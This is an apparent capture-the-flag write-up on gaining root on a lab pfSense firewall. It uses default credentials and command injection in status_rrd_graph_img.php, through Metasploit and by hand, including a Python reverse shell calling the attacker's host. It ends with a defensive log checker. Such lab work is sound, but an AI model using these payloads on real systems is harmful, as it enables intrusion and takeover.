Enumeration
Nmap discovered 2 open ports: http and ssl/https.
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after: 2023-04-06T19:21:35
| MD5: 65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
|_ssl-date: TLS randomness does not represent time
First, let’s add the host to the hosts file and go to the web application.
Apparently, the certificate is weird and the browser does not let me make an exception. So instead, let’s go to the application with just the IP in the URI:

Ok, going to the application with the IP works fine and a login form appears.
I tried some default passwords and a SQLi error check, with no success:

Wikipedia Info on PFSENSE
pfSense is a firewall / computer software distribution based on FreeBSD.
Searchsploit
# searchsploit pfsense
Exploit | Path
<deleted XSS and CSRF exploits>
pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | unix/remote/43193.rb
pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
Exploit-DB
- Metasploit module RCE – requires an authenticated user
- Python exploit, command injection, reverse shell – requires auth
- “pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. This script will return a reverse shell on specified listener address and port. Ensure you have started a listener to catch the shell before running!”
Metasploit exploit modules
msf6 > search pfsense
Matching Modules
================
# Name Disclosure Date Rank Check Description
------------------------------------------------------------------------------------------------------------------------------------------
0 exploit/unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
2 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE
Dirbuster
Dirbuster did not find a single file or directory on port 80 (probably because of redirect/firewall rules). However, that is not the case for port 443.

The files system-users.txt and changelog.txt seem interesting. Let’s check them.
system-users.txt contents:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
We have a user Rohit with default credentials for pfSense.
According to the Netgate docs, the default credentials for pfSense are admin:pfsense, so in our case they should be rohit:pfsense.
changelog.txt contents:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
Apparently there have been 3 vulnerabilities, 2 of which have been patched and 1 is still unpatched.
Exploit
Let’s log in with the obtained credentials (rohit:pfsense). There are multiple dropdown menus in the interface; however, only under Status do we have additional functionality.
During the enumeration phase we discovered multiple exploits, information that there is an unpatched vulnerability, and we obtained credentials. Some of the identified exploits require authentication – we should try them first.
Meterpreter
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
Obtaining a Meterpreter session from the Metasploit module pfsense_graph_injection_exec.
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39282 bytes) to 10.10.10.60
[+] Deleted KIXxVsv
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.60:15059) at 2021-04-14 09:43:38 -0400
meterpreter > shell
Process 97206 created.
Channel 0 created.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
Manual exploitation
exploit-db
We know there is a command injection vulnerability somewhere. While googling more on that, I found the following post describing the command injection in status_rrd_graph_img.php in detail.
Under RRD Graphs we find the PHP file that is needed for this to work. Capturing a request from that page with Burp shows the following:
GET /status_rrd_graph_img.php?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse&graph=eight_hour HTTP/1.1
Host: 10.10.10.60
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://10.10.10.60/status_rrd_graph.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4dbcd8342e5f415d50a83af577962a2e; cookie_test=1618413161
We are interested in invoking the queues database and injecting our commands right after it:

Unfortunately, the response is gibberish that we cannot read. A neat little trick is to pipe the command output to netcat, making it readable, like so:

Resulting in:
# nc -nvlp 3333
listening on [any] 3333 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 59699
CMD INJECT
To open a reverse shell, we feed the request our own Python script, taken from the aforementioned Python exploit.
$ cat pipe-reverse.py
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.5",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
# nc -nvlp 3333 < pipe-reverse.py
listening on [any] 3333 ...
$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 20248
sh: can't access tty; job control turned off
# # id
uid=0(root) gid=0(wheel) groups=0(wheel)
You might need to press “Cancel” on the request in Burp in order to trigger the Python script for the reverse shell.
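From the defender’s side, the request above leaves a clear trace in the web server’s access log: the database parameter of status_rrd_graph_img.php should only ever be a plain .rrd file name. The following Python checker is an added example (not from this write-up or from pfSense) that parses common-log-format lines and flags requests whose database value is anything else; the log format and the sample lines are constructed here.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A legitimate value is a bare file name ending in .rrd (system-processor.rrd in the
# captured request); shell metacharacters, path separators or whitespace are flagged.
SAFE_DATABASE = re.compile(r"^[A-Za-z0-9_-]+\.rrd$")
TARGET_SCRIPT = "/status_rrd_graph_img.php"
# Assumed common-log-format line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Split one access-log line into fields; None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec

def is_suspicious(rec):
    """True for a graph-image request whose database value is not a plain .rrd name."""
    if rec is None or rec["path"] != TARGET_SCRIPT:
        return False
    return any(not SAFE_DATABASE.fullmatch(v) for v in rec["query"].get("database", []))

def scan(lines):
    """Return (ip, timestamp, database values) for every suspicious request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if is_suspicious(rec):
            hits.append((rec["ip"], rec["ts"], rec["query"]["database"]))
    return hits

# Constructed sample lines (not taken from the target's logs).
SAMPLE_LOG = [
    '10.10.14.5 - - [14/Apr/2021:09:40:01 -0400] "GET /status_rrd_graph_img.php'
    '?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse'
    '&graph=eight_hour HTTP/1.1" 200 5124',
    '10.10.14.5 - - [14/Apr/2021:09:41:17 -0400] "GET /status_rrd_graph_img.php'
    '?database=queues%3Becho%20CMD%20INJECT&graph=eight_hour HTTP/1.1" 200 0',
    '10.10.14.5 - - [14/Apr/2021:09:42:03 -0400] "GET /status_rrd_graph.php HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The same allowlist regex, applied server-side before the parameter reaches the shell, is also the fix the changelog’s “manual patching” refers to in principle.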